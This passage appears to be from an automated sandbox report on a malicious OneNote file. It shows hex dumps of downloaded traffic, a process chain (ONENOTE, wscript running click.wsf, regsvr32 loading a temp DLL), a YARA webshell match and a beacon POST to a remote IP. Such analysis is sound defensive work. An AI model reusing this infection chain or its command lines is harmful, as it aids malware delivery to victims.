87 c3 d2 79 70 bd 2d 11 83 d5 4b ba 2f 73 81 14 7c 92 d2 09 55 ce 72 5c da 6d 93 a2 7c 27 26 10 62 41 c2 40 6c eb 3d 56 4d b7 25 28 99 1e ae f0 06 c4 83 aa ea 62 Data Ascii: Btp}\|a-.$QItlOUs9Eg0u],C4HO0bq^c7D\OU'qg5\X.O4,G9?*4$8E!QqPk!-_fF0 !d4z-x<IpD^++.!-@&E)K$ !-Tnyp-K/s\|Ur\m\|'&bA@l=VM%(b
2023-03-17 08:10:06 UTC	176	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:06 UTC	176	IN	Data Raw: 34 30 30 30 0d 0a 70 8e 94 63 5d 32 2d 53 28 e0 28 21 7e a0 b1 95 a0 fb aa 66 95 51 fd b3 3e e1 65 39 da 0f 2c bf d2 49 a1 41 ea a4 e4 93 50 ec 84 de 42 da 65 73 e4 4c 27 44 6d 1c e0 82 50 6c 7c f9 49 41 70 09 8e 39 da 0f 2c c1 7e ba ac 45 79 c3 3c 7a 53 ad 08 2f b3 b2 f9 81 ec 6c 27 aa 04 7a 62 8e b4 68 f0 0d 24 20 76 c1 fa aa 14 5a bd 0d d3 a5 2e 18 f4 4c 35 7a 92 43 5d 32 2f 16 30 02 ec 7c 27 aa 3c 7a 3d a3 71 c7 f0 3d 24 40 ff 68 30 a0 24 5a b0 74 ba b7 e0 45 79 ed 70 9e 94 63 5d 35 d7 53 28 ea 28 21 e5 94 c6 9f c0 06 2d 18 7d 87 c3 d8 79 70 af 14 ae bd b5 3d 2b e7 fd a6 47 ef 70 62 da 63 99 f0 01 83 28 6a 65 39 fe 46 a1 69 c0 06 e5 f9 6c 78 3c d8 49 b8 b1 3c 51 42 f3 0d 2b f5 44 00 61 e5 78 62 2a 3a 1f ac 2f 16 30 45 ec 7c 27 aa 34 7a 61 04 ca 8b b0 Data Ascii: 4000pc]2-S((!~fQ>e9,IAPBesL'DmPl\|IAp9,~Ey<zS/l'zbh$ vZ.L5zC]2/0\|'<z=q=$@h0$ZtEypc]5S((!-}yp=+Gpbc(je9Filx<I<QB+Daxb*:/0E\|'4za
2023-03-17 08:10:07 UTC	184	IN	Data Raw: a0 fb e8 33 01 67 fd b3 3f e1 a5 99 52 42 34 c3 be da 68 00 61 93 d4 51 99 9e 08 a6 8b e9 f9 82 66 f3 fe c2 74 eb cc fb 36 74 71 f9 b9 e1 3f 68 30 45 4c 42 34 c9 86 da 68 00 61 35 b1 79 53 e1 c0 87 47 53 28 21 c1 39 3f aa c4 d2 42 43 35 25 b1 47 e9 d2 b1 d8 33 21 51 b5 d5 63 f9 b3 82 03 ab a5 dc 7c da ab f5 34 44 53 a9 de d5 3a 3f 2b 3f 9c aa 41 71 ff fc c8 3f 59 3c e3 a5 99 52 42 34 c3 be a2 68 00 61 8c c7 3f ac d9 ce ff cf d6 e0 68 65 39 14 e3 17 e1 3d 0f 55 28 04 7d 5a d0 48 24 50 e6 d4 82 37 48 33 85 85 00 61 28 b8 3e 77 46 c4 82 84 50 28 6b 89 05 38 32 f0 e7 81 40 35 74 55 dd c3 a6 bd dd f0 22 51 42 95 eb 34 7b ac 85 d1 67 35 7a e6 a9 45 37 2f d6 98 68 65 39 60 a2 f4 d2 42 43 35 f5 f4 c8 3f 59 3c 4e 87 21 51 c3 81 f8 30 62 6b 71 3a 4e e9 f1 de 96 46 Data Ascii: 3g?RB4haQft6tq?h0ELB4ha5ySGS(!9?BC5%G3!Qc\|4DS:?+?Aq?Y<RB4ha?he9=U(}ZH$P7H3a(>wFP(k82@5tU"QB4{g5zE7/he9`BC5?Y<N!Q0bkq:NF
2023-03-17 08:10:07 UTC	192	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:07 UTC	192	IN	Data Raw: 34 30 30 30 0d 0a fe 78 e2 ba 8c 3a f5 ea 98 64 c8 0e 42 f5 04 0f df 3e d9 81 bb 64 26 cb 71 5f f4 27 1c 76 0f 64 35 c2 f6 67 5f 93 cf 1e 5f 9c 84 12 f5 fa 98 61 8b 82 dc 71 f8 35 4b d8 49 1f e1 42 a8 da bf 0d 44 eb 2e 2b a6 21 42 d0 07 26 45 f6 29 24 25 ea 28 4e ca b4 85 8c c0 36 42 ea a5 58 c6 d2 79 1f b9 64 62 85 71 3f fd 45 6b 00 20 ef f4 f1 1e 51 b2 d6 85 b9 2c e2 30 4e be 5e 06 5c 7f 03 dd ff 34 0f b5 1c 3f af 75 56 fc ae 34 48 b2 27 1c 26 a4 9b ca bb 3e 51 46 f6 29 24 2c ea 10 4e 46 6b 4c 74 ca 06 42 fd 34 6b fb 1c 4b 80 ff 21 51 03 bf 89 b8 2f 1c f7 80 a5 df 7e da 73 32 5c 01 24 5c e2 20 4e be 6e 06 50 01 bc ca f5 04 0f 7a 29 a5 f6 bb 64 26 cb 71 4f f4 27 1c bf 34 64 35 3b d8 e7 c4 42 33 32 9e d4 cb b8 4a 5c 34 3e ab 8e b4 31 06 e9 90 59 3c e9 45 Data Ascii: 4000x:dB>d&q_'vd5g__aq5KIBD.+!B&E)$%(N6BXydbq?Ek Q,0N^\4?uV4H'&>QF)$,NFkLtB4kK!Q/~s2\$\ NnPz)d&qO'4d5;B32J\4>1Y<E
2023-03-17 08:10:07 UTC	200	IN	Data Raw: 3c 56 b8 c1 34 21 51 7f 40 08 33 62 64 84 21 66 35 7a 6e 5f ad 37 44 5c ac 40 67 39 3f 16 83 8d 41 43 3a f1 0d 7c 3c 59 fb 2d 33 a6 97 42 34 23 76 61 40 89 24 67 8d 73 98 1b c8 b6 01 50 96 87 9a c6 be 6e 72 f2 d1 bc ca f5 34 7b bf b3 3c 68 b1 54 52 3c f4 69 33 a5 2e ff 99 25 35 7a d2 63 ba c1 b7 53 28 aa 00 c6 36 aa 34 9d 25 7c 35 74 f0 3d c3 23 66 97 cf a0 24 bd ea 3d 58 60 ac 45 6a 18 c1 7a 53 ad 08 3c b3 b2 e9 81 60 b0 6a 20 f0 17 4a 1a 31 d5 e5 f9 49 52 53 68 91 b5 96 07 3b cd 03 62 6b 8b 24 6b b8 76 d3 af 08 38 c5 26 27 31 8b 38 3f ec 34 99 18 53 35 74 f0 3d c7 9b 83 68 30 a0 1c b9 cb 3f ac ad aa 65 9a 60 b4 0f a8 d4 cb c0 bd 94 6d 78 14 77 3f 2b f0 2f 52 df db 13 76 f9 49 4a 49 35 57 26 96 07 c3 eb 6b 62 6b 6b 24 93 7f f3 16 d1 fd fe 06 45 9a e0 28 Data Ascii: <V4!Q@3bd!f5zn_7D\@g9?AC:\|<Y-3B4#va@$gsPnr4{<hTR<i3.%5zcS(64%\|5t=#f$=X`EjzS<`j J1IRSh;bk$kv8&'18?4S5t=h0?e`mxw?+/RvIJI5W&kbkk$E(
2023-03-17 08:10:07 UTC	208	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:07 UTC	208	IN	Data Raw: 34 30 30 30 0d 0a e3 a0 f4 22 40 43 35 fd f4 38 3d 59 3c 20 bd 24 2d 1a 34 48 7b eb ee 98 61 64 35 bd d6 66 44 37 44 5d 67 6b 65 b8 8a 6b 70 62 41 34 3b 1c 3a b9 91 19 3d 68 30 23 90 ef 74 49 33 62 66 81 ec 24 34 7a 53 93 a8 c0 f2 d2 9d 2b 64 39 3f ba 8e 95 f7 c8 b0 34 70 78 3c d0 b9 28 31 21 51 0a b9 4d b3 79 94 ff 29 ed b0 7a 52 26 45 7f c9 56 1e af 9a c6 77 a2 35 46 21 84 b0 34 70 78 3c 14 0a 68 30 e0 fc 02 35 48 33 6f e8 b5 21 65 35 7a 36 ad c0 77 45 53 28 e2 e0 79 3e 2b 71 a5 c4 03 34 74 71 0e 94 59 3c e9 bd 61 50 42 34 8f 77 2a 53 c1 c4 24 34 7a 53 29 c4 82 04 52 28 6b 01 b9 44 5d fa e7 01 42 35 74 f8 fd 7c 58 3c 68 78 ac 54 b3 2f 49 33 2a e2 45 31 2c b8 7f 65 31 45 37 0c da 6d 83 2d b4 3a cc 00 62 41 0b bc 31 f9 30 b1 5c 5c 86 cf de 19 cb 70 6c 73 Data Ascii: 4000"@C58=Y< $-4H{ad5fD7D]gkekpbA4;:=h0#tI3bf$4zS+d9?4px<(1!QMy)zR&EVw5F!4px<h05H3o!e5z6wES(y>+q4tqY<aPB4wS$4zS)R(kD]B5t\|X<hxT/I3E1,e1E7m-:bA10\\pls
2023-03-17 08:10:07 UTC	216	IN	Data Raw: e8 a8 dc cb 99 23 d2 8d dd 6b 23 fb 17 02 05 19 17 ac d7 ea 11 1d 7f 14 b3 9f be 84 71 50 09 9e aa 59 3c e9 7c 05 29 60 63 73 4e e3 1f 24 19 46 6b 98 a2 a7 31 13 3c 4c 7f b5 e9 b2 7b 0f 09 e9 05 67 75 9c 2f 20 c3 a6 74 e1 35 6e 32 43 34 0c b8 a9 2e 33 a1 2c be ac d8 e9 0d bc 18 77 48 23 ee 4d 1b 43 39 e1 85 13 6a 3c 8e 98 f0 95 74 eb dc 09 96 06 10 40 89 d3 6b 00 a6 20 11 76 31 09 45 37 83 17 0c 7b 11 f5 3f 2b b6 26 65 73 97 0c 71 78 70 d2 fd a9 54 05 61 48 bf 0c 17 52 e6 14 21 a5 d7 78 da 72 61 07 95 37 0c 5b e4 7d 1b 1b 34 a5 41 43 b4 00 55 48 66 06 01 45 bb 65 75 72 bd 0c 17 52 ac 44 45 24 8c 86 33 0b 82 33 60 bc 52 de 7c fe 7b 0f 49 7c 11 de ba b3 35 5c 74 b7 46 4d 36 e6 15 66 04 f3 0c 62 6b 81 25 40 05 5a 03 26 45 b6 00 77 18 27 7e c6 c0 aa 05 46 71 Data Ascii: #k#qPY<\|)`csN$Fk1<L{gu/ t5n2C4.3,wH#MC9j<t@k v1E7{?+&esqxpTaHR!xra7[}4ACUHfEeurRDE$33`R\|{I\|5\tFM6fbk%@Z&Ew'~Fq
2023-03-17 08:10:07 UTC	224	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:07 UTC	224	IN	Data Raw: 34 30 30 30 0d 0a 3d 3c f8 04 18 49 69 20 bd 8d 75 12 c8 b7 cc 2a ea ec d1 60 35 7a 1a ad 9c 7f cf aa c0 1c 4b 39 3f ec 35 46 01 1c 5a 74 71 bf 78 7d 78 10 74 21 51 71 f4 00 ba 26 4f 48 a6 20 11 46 60 3b 45 37 08 de 64 4f 35 f8 53 0f 4d 6c c0 37 11 48 a5 38 38 59 fb 2c 14 15 14 13 34 48 f2 0e 4f 34 63 e5 79 5e 67 68 c3 dc fe 92 4c 4f 51 31 be 67 55 56 bb c5 1b fa f0 0c 18 6d d2 29 8e ce 96 06 10 70 69 b5 6b 00 e0 28 11 42 4a 60 ca f5 c5 27 0c 53 79 ce bf e9 b6 26 65 73 88 59 71 78 57 1d 18 58 61 a8 15 66 04 c9 7f 46 5b b0 b8 67 06 fb 27 02 75 d3 5d fb 25 ea 11 1d 0f d0 5b c7 7f c8 71 50 41 3c b7 1d 18 50 bb 75 75 76 bf 04 17 5e e2 44 45 4c f2 3e 77 06 7d 37 44 53 c0 5a 53 39 3f ec 35 46 75 65 07 74 71 c0 f7 32 14 c7 bb 6d 75 76 78 c5 7e f2 9c e1 4a ae 8d Data Ascii: 4000=<Ii u*`5zK9?5FZtqx}xt!Qq&OH F`;E7dO5SMl7H88Y,4HO4cy^ghLOQ1gUVm)pik(BJ`'Sy&esYqxWXafF[g'u]%[qPA<Puuv^DEL>w}7DSZS9?5Fuetq2muvx~J
2023-03-17 08:10:07 UTC	232	IN	Data Raw: 8b bb ec 64 35 f1 1e c6 b2 d6 6f 99 f9 82 66 f3 fe c2 77 eb 0c a3 b4 31 91 4d 6f a6 c3 a9 55 c1 52 29 71 a8 19 eb 2e e0 e0 11 d5 30 d6 38 ba 7e cf 55 60 e2 21 1d 0f a0 34 82 c8 07 11 5c fa 3d d8 1d b7 25 d8 65 da 07 d8 09 b8 34 63 48 ea 29 cd f3 17 02 65 df f8 eb d7 94 a2 7c d7 8f d7 62 41 82 50 9c 7a f3 f4 e3 3d 68 30 21 d0 07 dc da b7 62 6b bf fa 50 35 7a 92 4b ad 27 c5 26 c0 5e 60 39 3f a0 34 8a 7a 8b 3a 30 83 91 ea a7 c3 97 8f e2 1a 42 34 a1 e2 9c 94 ff a6 21 d1 20 0a 26 45 b6 01 b7 6f 42 9a c6 be 6e 95 48 2b bc ca b5 1c 9c 36 d8 49 8c 62 21 6b 42 f3 0d db 83 a4 00 61 e5 70 92 b5 1b 45 37 c5 16 c0 65 80 39 3f aa 04 8a 8e 55 08 5a f0 0d d4 8f d6 55 1e aa 14 aa bf 0d d7 8a 55 59 61 64 f2 3f bf 59 73 37 44 1b a3 b3 2d b4 7a d3 b0 07 ad 53 7d fd 35 5c 04 Data Ascii: d5ofw1MoUR)q.08~U`!4\=%e4cH)e\|bAPz=h0!bkP5zK'&^`9?4z:0B4! &EoBnH+6Ib!kBapE7e9?UZUUYad?Ys7D-zS}5\
2023-03-17 08:10:07 UTC	240	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:07 UTC	240	IN	Data Raw: 34 30 30 30 0d 0a fb 2c 14 09 e3 d0 34 48 f4 26 4f 2c ed 84 35 7a 94 62 61 07 6e 93 28 6b 2d bc ff 5e 2e a5 05 67 15 8c f3 78 3c e0 d6 80 b3 8b 10 fb 8d 4a 36 f5 ea 44 45 44 b1 5e ac d9 c4 73 60 73 4b 3c 9a c6 be 67 55 42 b7 a6 7f 49 f0 0c 18 79 9c a6 ca de 96 06 10 6c 1b f1 6b 00 e0 28 11 5e 94 c3 cb 85 c5 27 0c 4f cd 02 b7 99 fa 26 65 67 be 30 55 58 d4 72 c4 96 cf 69 d8 47 b8 4b 32 62 23 8b b6 2c be b1 1b ad 19 13 14 1b ab af 25 66 77 d4 91 ae c8 0f 11 7c 24 30 b7 b5 74 eb dc 41 96 07 c4 b8 3f 62 6b 33 a1 ed 70 8e 94 63 55 9a 6b 53 28 ea 10 29 79 24 3b 98 80 2e 25 7b f0 0d 2c 38 c7 5e 99 aa 14 52 bd 0d df a5 2e 10 7a 81 35 7a d2 63 55 cf 85 ac d7 ea 20 29 ad 56 8e 9d c0 36 25 d9 fc d8 ab d2 79 78 b9 64 b9 85 71 a8 57 47 6b 00 d9 39 74 36 fd ad 08 d7 b3 Data Ascii: 4000,4H&O,5zban(k-^.gx<J6DED^s`sK<gUBIylk(^'O&eg0UXriGK2b#,%fw\|$0tA?bk3pcUkS()y$;.%{,8^R.z5zcU )V6%yxdqWGk9t6
2023-03-17 08:10:07 UTC	248	IN	Data Raw: d8 63 96 bc 11 14 a3 26 aa b0 7b 0f 59 a5 05 67 15 54 71 78 3c b1 c0 be cf de e9 76 77 48 33 8b 7a ff 9e 9b f2 3f 98 43 4a 37 44 eb e3 00 4d 96 b4 66 ba 95 a0 68 ff a5 98 7b f6 98 d5 6d b9 6c 9a 83 59 83 39 a3 06 cb 67 e5 40 b1 86 1f 17 69 c5 26 e3 90 41 63 61 ec 34 a5 2e c0 35 74 1a 3d fb 0a b5 2d f7 99 68 cc d7 70 b8 2f ac f7 80 a5 df 7e da 73 82 f6 29 94 2a ea 10 fe 29 a0 71 62 86 06 fa d4 2c 78 3c 32 79 a7 12 a8 14 8d b5 3d fc 2e 97 04 61 a3 70 3d 57 4f 45 37 2f 16 6f 31 ec 7c 78 aa 34 25 13 a2 35 74 b0 15 7b 54 57 2d 77 3c d8 07 73 c9 46 25 7d 3e 68 64 be 3f 14 62 ce 7a 8b 17 a3 2e a2 b2 72 e0 f8 26 65 6b 7d fd 2d 5c 1c b1 de df 30 21 e9 e1 21 48 33 8b 38 fe 9e 9b 7d f1 16 c9 0d be 01 5c ef 2e 22 28 cf 2b 71 e3 04 04 b4 38 71 78 bd 1c 7b 06 78 de ae Data Ascii: c&{YgTqx<vwH3z?CJ7DMfh{mlY9g@i&Aca4.5t=-hp/~s)*)qb,x<2y=.ap=WOE7/o1\|x4%5t{TW-w<sF%}>hd?bz.r&ek}-\0!!H38}\."(+q8qx{x
2023-03-17 08:10:07 UTC	256	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:07 UTC	256	IN	Data Raw: 34 30 30 30 0d 0a 8c 9a 33 62 aa a5 41 62 35 7a 5f a7 c0 17 42 53 28 dd e6 c6 c0 aa fc 42 47 43 35 a1 c1 76 82 d8 89 48 36 21 51 46 38 6e 8c a5 ee 18 67 64 35 aa 56 26 45 bc c1 4b 2e 6b 65 b4 33 eb 72 ab c8 ce 2d 72 71 78 74 d4 71 fc b1 a4 49 44 34 48 96 81 94 ff a0 c1 2d 7c 53 26 43 b6 f1 4b 2e 6b 65 8f c5 32 71 a5 c4 53 33 74 71 c7 f9 59 3c e9 b5 31 57 42 34 77 b0 9d 94 81 e4 74 33 7a 53 cc b6 c8 bb d2 ad 7b 63 39 3f 49 ec 9d be 82 98 64 77 78 3c 5f bd dd 20 27 51 42 aa b0 ce 61 e0 85 71 62 35 7a da 62 61 77 0c d8 6d f3 2d b0 7b 0f 49 e9 c4 5b 33 74 71 f1 78 7d 0c e3 b5 01 57 42 34 c1 77 46 43 8b e4 4c 33 7a 53 af 01 13 64 bb 62 0d 9b c6 ba eb 7e e7 01 42 35 74 b6 3d bc 62 4f 68 30 99 2c 4e fa 8f b2 2f eb 71 94 14 cf f1 1e a6 b2 d6 fc 56 69 7b 61 f8 d5 Data Ascii: 40003bAb5z_BS(BGC5vH6!QF8ngd5V&EK.ke3r-rqxtqID4H-\|S&CK.ke2qS3tqY<1WB4wt3zS{c9?Idwx<_ 'QBaqb5zbawm-{I[3tqx}WB4wFCL3zSdb~B5t=bOh0,N/qVi{a
2023-03-17 08:10:07 UTC	264	IN	Data Raw: 6d 1c ee 6c 90 a0 3c 1d c8 07 11 54 99 49 4b a7 c3 af 75 56 dc a8 34 48 b2 27 1c fe ce 9b ca 11 16 51 23 be 01 24 43 2e 12 48 b6 6e 06 e9 04 34 b8 78 31 c0 9d f9 9c c8 f1 c0 55 cb 79 3f b2 17 1c d2 41 c6 2d bd 16 89 53 0d 44 53 a3 26 ca ce de ea 9b 67 c8 16 9a f5 04 d7 ca 7b 37 68 f7 64 f6 99 57 48 33 e3 2e a7 09 df 35 7a d2 53 e2 da b1 59 28 ac 20 46 58 42 71 62 c0 06 4a cc bc 78 3c 15 b7 a7 b1 54 2e bc 3d 49 33 e9 2e 7f 25 ef 70 dd d8 73 ea de 19 a8 d7 94 a2 7c 48 5b 78 62 41 82 50 03 7f 13 79 2e 37 e1 75 56 3a 07 43 20 ba 27 1c 81 14 13 a5 99 7d ad ce 72 33 bb 50 40 9a c6 f8 6e 06 90 bd 43 35 f5 34 0f a4 f5 c3 97 78 aa 89 c3 41 3f f2 8f 29 4d ea 21 42 f3 16 c9 82 72 33 d1 f6 6b 65 f8 52 5c 75 e3 34 34 dc 79 71 78 b7 1c 4b e1 75 d2 96 07 43 df b7 62 6b Data Ascii: ml<TIKuV4H'Q#$C.Hn4x1Uy?A-SDS&g{7hdWH3.5zSY( FXBqbJx<T.=I3.%ps\|H[xbAPy.7uV:C '}r3P@nC54xA?)M!Br3keR\u44yqxKuCbk
2023-03-17 08:10:07 UTC	272	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:07 UTC	272	IN	Data Raw: 34 30 30 30 0d 0a 61 2c bc 32 63 6e c0 fe 4b d6 07 69 65 39 87 e8 39 62 41 aa db 89 8e 87 fb 1c 24 01 f6 21 51 83 51 50 38 e3 2e 18 a6 3e ca 85 d2 6b 5d 8c fe dd aa ea 10 21 77 e7 cc e4 86 06 15 e2 c6 78 3c d8 79 48 48 f3 ae bd 8e 08 33 62 6b c1 0c 44 36 fb 26 06 34 53 4d 53 a3 2e 45 b2 7a 33 99 11 32 bc ca 3c f8 7d 7c 26 3c 68 78 a4 91 4d b0 99 32 62 6b b8 3a af 35 7a ba ad b8 c8 bb 94 6d 4b 75 60 3f 2b c9 e7 51 01 3d ff 3c 58 cb b8 84 ed 20 63 59 69 fe 99 da 61 a1 c1 88 61 bc 37 73 e7 28 17 4c d2 65 4b 85 49 49 db f0 17 61 f8 33 00 81 bf 79 41 0f f1 30 21 d0 07 2c 2d 3d 62 6b c1 0c 7c 31 f1 1e 3e b2 d6 6f 99 f9 82 66 f3 fe c2 75 eb 0c 5b f4 19 69 7e bd 2c 24 89 e2 22 51 85 71 60 48 20 6b 00 a0 01 1d 74 d2 63 6d a2 9b 53 28 ea 10 11 46 88 e7 72 86 06 05 Data Ascii: 4000a,2cnKie99bA$!QQP8.>k]!wx<yHH3bkD6&4SMS.Ez32<}\|&<hxM2bk:5zmKu`?+Q=<X cYiaa7s(LeKIIa3yA0!,-=bk\|1>ofu[i~,$"Qq`H ktcmS(Fr
2023-03-17 08:10:07 UTC	280	IN	Data Raw: 8e 2a c8 46 c3 10 71 78 78 d2 f3 2c bb e7 19 c9 e7 00 b8 af 27 8d 3d 40 55 33 d8 7d 55 7e cf 38 30 22 ee 4a 1f 62 fa 81 1e 0b ca 94 bd b4 70 d2 e0 21 b9 7a 59 0b bd 23 2b 2b e2 73 41 33 7d f9 bf 76 ce b3 60 f3 28 6b 65 71 b4 97 55 ca 41 43 35 3c fa e4 18 c9 3c 68 30 68 d8 39 c4 c1 77 46 2b 8b e5 40 ad 7a 53 26 cc 73 60 6b a3 ef 41 b1 3f 2b 71 2b c8 18 ed fd 35 5c 14 d2 b8 4c b0 21 51 42 8e 4c 32 62 6b 49 ea 8d 7c f1 a3 af 01 13 64 bb 20 25 9a c6 85 45 e6 9b b2 84 71 50 19 a7 c6 59 3c 80 b2 47 af bd 78 c3 fc 2e e0 c5 db 60 34 7a 53 6e ce fc 0c da 9c 4f e5 39 3f 2b 39 e9 1d 67 55 3c fa 14 18 29 74 e3 44 05 29 0a b7 8c 63 3d 23 ff 81 a8 79 f1 8f 6f cc 6c 4c 1a a1 00 75 70 b6 58 69 2b c8 38 15 35 27 30 bf b5 4c e3 b4 05 b1 42 34 48 7b e9 c7 24 89 64 35 7a 17 Data Ascii: *Fqxx,'=@U3}U~80"Jbp!zY#++sA3}v`(keqUAC5<<h0h9wF+@zS&s`kA?+q+5\L!QBL2bkI\|d %EqPY<Gx.`4zSnO9?+9gU<)tD)c=#yolLupXi+85'0LB4H{$d5z
2023-03-17 08:10:07 UTC	288	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:07 UTC	288	IN	Data Raw: 34 30 30 30 0d 0a a9 be 01 a7 ef 2e 75 f6 7b 2b 71 e3 34 53 1a 03 a8 63 84 da 82 c8 1f aa 04 52 c3 aa f2 88 68 89 34 74 b4 0f 43 42 87 03 e1 d2 5d 7b fc b9 a7 8e fa 27 51 ca 70 64 b6 3d 1c ff 7d 45 2d e6 14 a2 d5 20 72 59 ac 45 79 b7 6d 99 b5 e1 00 1f a5 3b 82 f9 a2 7c 2f 91 b2 62 41 82 50 64 61 f3 79 49 fd 88 37 a8 14 52 b5 3d 23 3f e2 09 bc ef 70 6a da 63 55 bc 09 4b a3 2e 45 0a f7 6a f8 6a 86 06 25 69 40 78 3c d8 79 78 7e dc 51 42 b5 0d 23 80 35 00 61 0f 70 6a 3e af 00 27 c5 1e 38 89 5b 20 77 aa 04 72 f7 f5 85 3c fa 3d 2c d0 79 78 bb 6c 79 c9 71 a8 00 aa 2a 89 29 60 f2 3f 43 34 73 37 44 92 4d 7b 63 b2 7a 3b fc 6e 81 40 fc fd 3c 68 bd 1c 2c bb 1a de ae c3 71 58 60 7c 94 ff e0 11 25 01 40 de 45 bc 01 43 a1 2e 75 71 bc ef 51 3f 82 8f f9 b8 39 fb d0 71 fb Data Ascii: 4000.u{+q4ScRh4tCB]{'Qpd=}E- rYEym;\|/bAPdayI7R=#?pjcUK.Ejj%i@x<yx~QB#5apj>'8[ wr<=,yxlyq*)`?C4s7DM{cz;n@<h,qX`\|%@EC.uqQ?9q
2023-03-17 08:10:07 UTC	296	IN	Data Raw: fe 8f dd 11 b1 2d a7 68 da 8d f5 a2 35 2a e2 44 45 4c bc 2f dc 6e c8 62 eb d2 5d e4 b7 ae 3d 2b fa 27 ce 07 be 38 55 28 78 d2 79 ef b9 65 75 62 dc 29 4c 9c 94 f7 b9 7f f5 5f e7 e4 45 37 41 3c 08 6b 65 d0 d5 d1 8e 9d 86 07 11 24 c2 a1 3c 59 bd 2c 14 71 ca 15 cb b7 b2 2e 4f 50 db 07 a0 68 d2 62 61 67 fd 1e d7 94 0e 7d 1b 7b 52 eb 05 67 65 f5 05 5c 6c a5 d0 38 ba e6 14 c5 08 8c 33 62 00 45 e6 52 bc 3f d4 9e 7c b6 57 6b a9 26 e2 25 21 eb 76 e3 34 c4 dc 82 9b 7f fb 1c b3 6a 61 21 51 c3 79 c7 e5 26 28 7b e0 11 ba fe 2c 61 3e f0 01 d0 91 f1 65 39 b4 66 f2 95 a0 fb 8a 22 be 76 17 93 ed 81 33 eb 90 ab 32 c1 7e e1 ba 6d e2 ef 78 f9 a4 c7 6e fd 95 ba 2b a1 a4 d0 39 a2 3c e1 08 c8 fa f5 04 fb 1c e5 35 68 bb 64 d2 cb 70 6c 73 2a e6 45 96 2c bc 3e 77 1e ce 72 cb da 6c Data Ascii: -h5DEL/nb]=+'8U(xyeub)L_E7A<ke$<Y,q.OPhbag}{Rge\l83bER?\|Wk&%!v4ja!Qy&({,a>e9f"v32~mxn+9<5hdplsE,>wrl
2023-03-17 08:10:07 UTC	304	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:10:07 UTC	304	IN	Data Raw: 31 36 30 30 0d 0a 39 9a 3d 2b 65 8d 41 43 56 87 71 78 48 fa 3e 68 e8 d2 51 42 7c bd 33 62 eb a3 63 64 7d 8f 53 26 19 c1 44 53 78 cb 67 39 63 dd 71 62 3a b4 35 74 6d d8 3e 59 40 9f 30 21 92 ba 34 48 af c1 69 00 a5 9c 35 7a 54 d9 45 37 f4 f0 2a 6b 6d c6 3f 2b c4 9d 41 43 49 d6 73 78 84 a6 3c 68 d1 21 50 42 28 e8 31 62 8f 00 60 64 3c 78 52 26 89 94 46 53 24 69 64 39 9a 2e 70 62 99 e0 37 74 d9 7d 3d 59 28 6e 31 21 bd e1 36 48 27 64 6a 00 c1 63 34 7a af 85 47 37 e4 54 29 6b 27 31 3e 2b 5d c2 43 43 71 7c 70 78 f5 51 3d 68 28 85 53 42 f8 40 32 62 04 0a 60 64 15 de 51 26 35 3d 45 53 a3 60 64 39 6f 8b 73 62 cd 48 34 74 28 75 3d 59 10 cc 32 21 0d 4f 35 48 1a 6c 6a 00 e9 c5 37 7a 7f 28 44 37 1e 5c 29 6b 79 99 3d 2b 2d 6d 40 43 1b 64 70 78 10 f9 3e 68 00 31 50 42 f2 Data Ascii: 16009=+eACVqxH>hQB\|3bcd}S&DSxg9cqb:5tm>Y@0!4Hi5zTE7*km?+ACIsx<h!PB(1b`d<xR&FS$id9.pb7t}=Y(n1!6H'djc4zG7T)k'1>+]CCq\|pxQ=h(SB@2b`dQ&5=ES`d9osbH4t(u=Y2!O5Hlj7z(D7\)ky=+-m@Cdpx>h1PB

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49689	182.162.143.56	443	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-17 08:11:05 UTC	310	OUT	POST /jesecsgigcdk/zfgrij/wjhswvhm/ HTTP/1.1 Connection: Keep-Alive Content-Length: 0 Host: 182.162.143.56
2023-03-17 08:11:06 UTC	310	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 17 Mar 2023 08:10:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2023-03-17 08:11:06 UTC	310	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ONENOTE.EXEPID: 5812, Parent PID: 3528

General

Target ID:	0
Start time:	09:09:35
Start date:	17/03/2023
Path:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing.one
Imagebase:	0x380000
File size:	1676072 bytes
MD5 hash:	8D7E99CB358318E1F38803C9E6B67867
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 6076, Parent PID: 5812

General

Target ID:	1
Start time:	09:10:00
Start date:	17/03/2023
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
Imagebase:	0x1030000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 6140, Parent PID: 6076

General

Target ID:	2
Start time:	09:10:06
Start date:	17/03/2023
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll
Imagebase:	0x2c0000
File size:	20992 bytes
